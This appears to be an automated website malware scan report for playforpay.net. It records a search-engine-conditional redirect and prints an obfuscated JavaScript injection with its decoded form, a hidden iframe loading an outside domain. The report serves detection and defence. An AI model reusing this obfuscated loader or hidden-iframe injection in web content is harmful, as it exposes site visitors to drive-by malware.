Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://playforpay.net/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: playforpay.net Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Thu, 28 Aug 2014 09:29:53 GMT Location: http://ifchepa.com/images/img.php Server: Apache Vary: Accept-Encoding Content-Length: 217 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://playforpay.net/ | 200 OK Content-Length: 6123 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var ar="ep. ;d)c<(}\"i:vmoArC1tE=w2]b0{fns/uh,B[>gl NaT'y";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f9,9,36,90,126,27,15,48,21,102,45,0,93,63,6,120,0,63,66,123,0,45,0,93,63,96,111,141,135,132,120,129,132,45,0,27,138,81,48,15,141,138,18,114,84,78,18,87,9,9,9,36,90,54,132,45,0,54,27,18,12,9,9,30,126,0,123,96,0,126,87,9,9,9,15,48,21,102,45,0,93,63,6,72,54,36,63,0,27,33,24,36,90,54,132,45,0,126,96,54,21,69,138,105,63,63,3,39,99,99,96,102,81,21,48,96,36,6,21,48,45,99,21,48, e(s); Decoded script: [9,9,36,90,126,27,15,48,21,102,45,0,93,63,6,120,0,63,66,123,0,45,0,93,63,96,111,141,135,132,120,129,132,45,0,27,138,81,48,15,141,138,18,114,84,78,18,87,9,9,9,36,90,54,132,45,0,54,27,18,12,9,9,30,126,0,123,96,0,126,87,9,9,9,15,48,21,102,45,0,93,63,6,72,54,36,63,0,27,33,24,36,90,54,132,45,0,126,96,54,21,69,138,105,63,63,3,39,99,99,96,102,81,21,48,96,36,6,21,48,45,99,21,48,102,93,63,75,6,3,105,3,138,126,72,36,15,63,105,69,138,60,84,138,126,105,0,36,120,105,63,69,138,60,84,138,126,96,63,141,123 <iframe src='http://subcosi.com/count2.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://isante.ma/facebook.php | 500 Can't connect to isante.ma:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://isante.ma/test404page.js | 500 Can't connect to isante.ma:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
http://przejrzystaoswiata.pl/js.php | 500 Can't connect to przejrzystaoswiata.pl:80 (Bad hostname) Content-Length: 174 Content-Type: text/plain | clean |
http://24onlinedrug.com/search.php | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://w3rocks.com/swfobject.js | 404 Not Found Content-Length: 7761 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=playforpay.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://playforpay.net/
Result: playforpay.net is not infected or malware details are not published yet.
Result: playforpay.net is not infected or malware details are not published yet.